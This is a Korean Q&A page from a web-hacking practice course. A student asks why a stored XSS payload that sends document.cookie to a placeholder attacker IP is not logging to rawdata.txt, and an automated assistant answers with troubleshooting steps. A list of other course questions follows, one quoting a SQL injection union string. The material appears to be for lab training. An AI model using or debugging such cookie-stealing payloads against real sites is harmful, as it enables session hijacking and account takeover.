세션 하이재킹 질문
127.0.0.1/session/session.php?session=test
이것으로 rawdata.txt에
날짜와 시간/ip주소/test는 잘 출력이 되었습니다.
다른 웹브라우저에서 공격자id로 접속해서 다음과 같이 게시판을 작성하였으며 그때 ip주소를 어떻게 할당받는지가 궁금합니다.
<script>location.href = "http://공격자ip/session/session.php?session=" + document.cookie</script>
이 게시판의 내용은 rawdata.txt에 저장되지 않습니다.
무엇이 잘못되었을까요?
Câu trả lời 2
0
안녕하세요, 인프런 AI 인턴입니다. Yoonjae Kim님, 세션 하이재킹과 관련한 질문을 주셨네요.
기본적으로, 다른 웹 브라우저에서 스크립트가 정상적으로 실행되어야 rawdata.txt에 세션 정보가 기록됩니다. 아래의 사항들을 확인해 보시기 바랍니다:
공격자 IP 주소 확인:
location.href에서 사용한 IP 주소가 공격자의 실제 서버 IP 주소인지 확인하십시오. 공격자 서버의 IP 주소가 정확하지 않으면, 요청이 다른 곳으로 가기 때문에 rawdata.txt에 기록되지 않을 수 있습니다.서버 로그 확인: 공격자 서버에서 요청을 제대로 받고 있는지 확인하세요. 서버 로그 파일을 확인하면 요청이 들어오고 있는지 알 수 있습니다.
스크립트 실행 여부 확인: 게시판의 XSS 스크립트가 제대로 실행되고 있는지 확실하게 확인하세요. 일부 보안 조치가 적용되어 있다면, 스크립트 실행이 차단될 수 있습니다.
파일 권한 확인: 해당 스크립트가 rawdata.txt 파일에 정상적으로 접근하여 데이터를 쓸 수 있는 권한이 있는지 확인하세요.
관련 내용을 참고하시려면 아래 게시물을 확인해보실 수 있습니다:
해당 게시물에서는 세션 하이재킹과 관련하여 발생할 수 있는 문제와 해결책을 다루고 있습니다. 위의 사항들을 점검해보시고 만약 문제가 지속된다면 위 링크의 내용을 참고하셔서 해결책을 찾아보시기 바랍니다.
저는 질문자님의 이해를 돕고자 지식공유자님의 기존 답변을 참고하여 유사한 답변 링크를 추천해드리고 있습니다.
현재 베타 기능으로 답변이 만족스럽지 않을 수 있는 점 양해 부탁드립니다. 🙏
추가적으로 궁금한 점이 있으시면, 이어서 질문해 주세요. 곧 지식공유자께서 답변해 주실 것입니다.
[실습2-2] 인증 우회 공격 오류
0
72
2
cmd로 검색하면 잘 나오는데 웹 페이지에서 작성하면 결과값이 안 나옵니다.
1
61
2
저 웹페이지는 어떻게 들어가나요?
0
90
1
맥북은 어떻게 설치해야 하나요?
0
138
1
XXE Injection 퀴즈에서 궁금한 점이 있습니다.
0
219
1
Burp Suite 관련 질문
0
103
2
실습 부분은 버프 사용법을 별도 공부를 하고 와야 따라하는게 가능 한 강의 인가요?
0
99
2
버프 스위트 설치 및 사용법에 대한 애매 모호함~
0
175
2
APMsetup 설치 부터 오류가 납니다.
0
212
1
' and 1=2 union select 'test','test',null~~ 검색하면 아무것도 없는 목록이 나와요
0
80
2
파일 업로드 취약점 공격 실습 웹쉘 미작동
0
164
1
CSRF 대응방안 궁금 사항 문의
0
126
2
php.ini가 아니라 php가 다운됩니다.
0
115
2
구문을 썼는데 삭제되지않아요
0
94
1
proxy switcher 다운로드 오류..
0
163
2
insecure_website 에러
0
140
2
취약환경 구축 not found 에러?
0
152
3
mysql 접속 에러
0
154
2
test' 부분이 실행되지않습니다.
0
111
2
monitor 이 안 켜져요
0
118
2
sql injection 공격이 가능한 순간 다른 기법을 사용하는건 비효율적이지 않나요?
0
178
2
리피터 글자가 깨짐현상
0
308
2
http://127.0.0.1/insecure_website/index.php 접속 에러 문제
0
130
2
실습6-1] CSRF공격을 통한 게시글 무단작성에서 오류가 발생합니다.
1
111
2